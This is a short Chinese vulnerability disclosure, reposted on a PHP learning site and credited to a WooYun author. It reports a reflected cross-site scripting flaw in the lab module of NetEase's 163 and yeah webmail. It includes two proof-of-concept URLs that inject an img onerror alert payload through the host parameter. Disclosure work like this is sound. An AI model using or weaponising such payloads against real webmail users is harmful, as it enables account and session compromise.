来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 网易系列邮箱实验室功能模块非持久型跨站~只测试了163、yeah邮箱均存在,估计其他系列的邮箱也存在。因为要用户登录情况下才触发。所以此处我把邮箱名用user代替!另外sid令牌即使...
网易系列邮箱实验室功能模块非持久型跨站~只测试了163、yeah邮箱均存在,估计其他系列的邮箱也存在。因为要用户登录情况下才触发。所以此处我把邮箱名用user代替!另外sid令牌即使随便给一个值可以弹框框,不知道这个令牌检查是否严格。这个也算一个漏洞吧~ 漏洞证明:
http://lab.mail.yeah.net/labweb/lab.do?m=lab&keyfrom=jisu_new.index&sid=IBOviSNbVkMpAEsswnbbgMrCKVvNwOMz&uid=user@yeah.net&host=webmail.mail.yeah.net%22%3Cimg%20src=x%20onerror=%22alert%28/xss/%29%22/%3E&ver=js4&style=1&skin=163blue&color=005590
http://lab.mail.163.com/labweb/lab.do?m=lab&keyfrom=jisu_new.index&sid=IBOviSNbVkMpAEsswnbbgMrCKVvNwOMz&uid=user@163.com&host=webmail.mail.163.com%22%3Cimg%20src=x%20onerror=%22alert%28/xss/%29%22/%3E&ver=js4&style=1&skin=163blue&color=005590
作者Cryin@乌云 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com